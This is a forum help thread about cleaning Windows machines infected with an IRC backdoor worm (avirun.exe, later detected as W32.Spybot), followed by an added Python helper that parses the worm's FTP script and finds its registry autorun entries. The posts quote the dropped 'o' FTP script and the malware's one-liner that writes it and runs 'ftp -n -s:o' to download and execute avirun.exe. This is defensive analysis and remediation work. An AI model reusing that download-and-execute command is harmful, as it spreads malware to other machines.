unknown virus / backdoor trojan for IRC

i have discovered a virus/backdoor trojan which i cannot find a resolution for.  i have pieces of the virus, but not the entire puzzle to clean the infected machines.  i have searched google, symantec, etc. for the process name (avirun.exe) but it was prob mutated.  here is what i have:

on windows 2000 and XP boxes i found a process that runs called avirun.exe. when it runs it makes the computer unable to accept connections, mainly because the virus is opening the box to an IRC channel.  i have to reboot in order to delete the avirun.exe, but first i have to delete all the "MSConfig" = "avirun.exe" entries out of the registry keys (and there are quite a few).  however, this process comes back. i then found a file, named simply "o", which is displayed below.  it looks as if this file FTP's the avirun.exe from another infected machine.  even if i delete all the entries, the avirun.exe and the o file, it still comes back, making me think that it spreads via a Windows exploit.  i could not find any file (i checked recently modified files) that is a batch that would call the o file to download the .exe, or any other executables in the regedit Run keys.  it looks like the Backdoor.Hacarmy.E trojan, except that it keeps coming back.

has anyone seen this? if so, is there a removal tool.  i think if you fully patch the OS and delete all parts, it will stay away, but i need to be able to get rid of it on unpatched systems to stop the spread.

FYI, a full symantec scan via the Internet or with the newest defs comes up clean.

o file:

open [ip address] [port]
user 1 1
get avirun.exe
quit
xxgeniusAsked:

Lobo042399Commented:
Hi xxgenius,

It sounds very interesting. The behaviour is that of a trojan. First thing I'd do is to download ProcessExplorer and run it. Look for the avirun and the o processes. In ProcessExplorer, double-clicking on a process will bring up a wealth of info, including Registry keys and the IP number to which the process is connecting. If you have a Firewall, you can create a rule to block access to that IP and then use KillBox to kill the offending files, but especially the o file, which is the monitor/downloader. Then you can use the info gathered from ProcessExplorer to clean up your Registry.

You can download ProcessExplorer and KillBox from:

http://www.gatesofdelirium.com/ee/tools/

By the way, before deleting these files I'd make a Zip file with them and send it to the guys at McAfee and Symantec for research.

Good Vibes!

Lobo
xxgeniusAuthor Commented:
These have been sent to Symantec and Sybari (which then disperses them to other engines).  According to Symantec, their latest Rapid Response would catch it (haven't tried it yet).  I can say that your Windows must be patched and then you can delete the files.  Here is what the avirun.exe does when executed:

C:\WINDOWS\system32>avirun.exe
echo open [IPaddress Port] > o&echo user 1 1 >> o &echo get avirun.exe >> o &echo quit >> o &ftp -n -s:o &avirun.exe
xxgeniusAuthor Commented:
symantec definitions 11/5/04 Rev 5 will detect it as W32.Spybot.worm.  

To rid your machine: fully patch with Windows updates and reboot.  Then run antiv and delete the files it finds.  Delete the "o" file.  Open regedit, search for all strings for the process and delete them.
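A triage helper for the two artifacts described in this thread, the dropped "o" FTP script (quoted in the question and in the avirun.exe command line above) and the "MSConfig"="avirun.exe" autostart values the removal steps say to search for in regedit. This is an added example, not code from the thread; it assumes the "o" file has the four-line shape quoted above and that the registry side is fed a .reg export of the Run keys, and the IP, port and registry contents are constructed samples.

```python
import re
from typing import Optional

# Constructed sample of the dropper's FTP script "o", in the shape quoted in the thread
# (open <host> <port> / user 1 1 / get avirun.exe / quit). IP and port are made up.
SAMPLE_O = "open 192.0.2.10 5577\nuser 1 1\nget avirun.exe\nquit\n"

# Constructed sample of a .reg export of the autostart keys. The "MSConfig"="avirun.exe"
# values are the persistence pattern the asker reported; the other values are benign filler.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="C:\\Program Files\\VMware\\VMwareTray.exe"
"MSConfig"="avirun.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"MSConfig"="avirun.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"""


def parse_ftp_script(text: str) -> Optional[dict]:
    """Parse a Windows `ftp -s:` script and return the peer it fetches from plus the
    file names it pulls, so the host/port can go into a firewall block rule. Returns
    None when there is no `open` line or no `get` line (not the worm's script shape)."""
    host, port, files = None, 21, []
    for line in text.splitlines():
        parts = line.strip().split()
        if not parts:
            continue
        if parts[0].lower() == "open" and len(parts) >= 2:
            host = parts[1]
            # `ftp open host port` with the port omitted means the default port 21.
            port = int(parts[2]) if len(parts) > 2 and parts[2].isdigit() else 21
        elif parts[0].lower() == "get" and len(parts) >= 2:
            files.append(parts[1])
    if host is None or not files:
        return None
    return {"host": host, "port": port, "files": files}


def find_autorun_entries(reg_export: str, needle: str = "avirun.exe") -> list:
    """Walk a .reg export and return (key, value_name, data) triples whose data names
    the suspicious binary, i.e. every entry that must be removed before the reboot."""
    hits, key = [], None
    value_re = re.compile(r'^"([^"]+)"="(.*)"$')
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]  # start of a new registry key section
        elif key is not None:
            m = value_re.match(line)
            if m and needle.lower() in m.group(2).lower():
                hits.append((key, m.group(1), m.group(2)))
    return hits
```

Running both functions over the samples yields the peer 192.0.2.10:5577 to block and the two Run/RunServices values to delete.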
GhostModCommented:
PAQd, 250 points refunded - asker posted solution

GhostMod
Community Support Moderator
Lobo042399Commented:
kewlio